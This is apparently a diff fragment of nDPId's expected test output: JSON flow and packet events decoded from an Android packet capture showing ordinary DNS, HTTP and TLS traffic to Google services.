00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871805,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="}
00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1582454871807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871807,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8DHkAAGcGh1atwk9ywKgCEABQj\/Jn2o0VwtQ8S6AS87jgEAAAAgQFlgQCCArQTChF\/\/83cgEDAwg="}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871808,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CzlAAEAGb57AqAIQrcJPco\/yAFDC1DxLZ9qNFoAQAVcBGQAAAQEICv\/\/N3vQTChF"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871814,"flow_last_seen":1582454871814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871814,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1582454871814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871814,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CFFAAEAGrQ\/AqAIQrNkVysroAbtCYT8sAAAAAKAC\/\/889QAAAgQFtAQCCAr\/\/zd9AAAAAAEDAwg="}
00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871745,"flow_last_seen":1582454871818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871818,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1582454871823,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871823,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrCJAAEARCSjAqAIQwKgCASm1ADUALW7k1fkBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="}
00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871823,"flow_last_seen":1582454871823,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871823,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -273,63 +273,63 @@
00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1582454871827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871827,"pkt":"TGr2n\/YnxiwDYGpkCABFAABMd48AAEARfbDAqAIBwKgCEAA1gEAAOLeFcqOBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"}
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871827,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1582454871839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871839,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8witAAEAGtnDAqAIQ2O8meID2AbsYfvWoAAAAAKAC\/\/+9gwAAAgQFtAQCCAr\/\/zeDAAAAAAEDAwg="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1582454871848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871848,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8oe8AAHYGHXGs2RXKwKgCEAG7yuig7Cw9QmE\/LaAS6yAtmgAAAgQFZAQCCArvemfU\/\/83fQEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1582454871853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871853,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CFJAAEAGrRbAqAIQrNkVysroAbtCYT8toOwsPoAQAVdF2AAAAQEICv\/\/N4bvemfU"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1582454871853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871853,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AF8AAHUGgz3Y7yZ4wKgCEAG7gPZMYENyGH71qaAS6yCi0QAAAgQFZAQCCArDx9w1\/\/83gwEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"}
00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871829,"flow_last_seen":1582454871829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871829,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1582454871829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871829,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8SmpAAEAGbHTAqAIQrNkUTKp+Abul3n3qAAAAAKAC\/\/+8ngAAAgQFtAQCCAr\/\/zeAAAAAAAEDAwg="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871839,"flow_last_seen":1582454871839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871839,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1582454871839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871839,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8witAAEAGtnDAqAIQ2O8meID2AbsYfvWoAAAAAKAC\/\/+9gwAAAgQFtAQCCAr\/\/zeDAAAAAAEDAwg="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1582454871848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871848,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8oe8AAHYGHXGs2RXKwKgCEAG7yuig7Cw9QmE\/LaAS6yAtmgAAAgQFZAQCCArvemfU\/\/83fQEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1582454871853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871853,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0CFJAAEAGrRbAqAIQrNkVysroAbtCYT8toOwsPoAQAVdF2AAAAQEICv\/\/N4bvemfU"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1582454871853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871853,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8AF8AAHUGgz3Y7yZ4wKgCEAG7gPZMYENyGH71qaAS6yCi0QAAAgQFZAQCCArDx9w1\/\/83gwEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"}
00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1582454871881,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1582454871881,"pkt":"xiwDYGpkTGr2n\/YnCABFAABErDBAAEARCRfAqAIQwKgCAZtQADUAMNjjuKUBAAABAAAAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="}
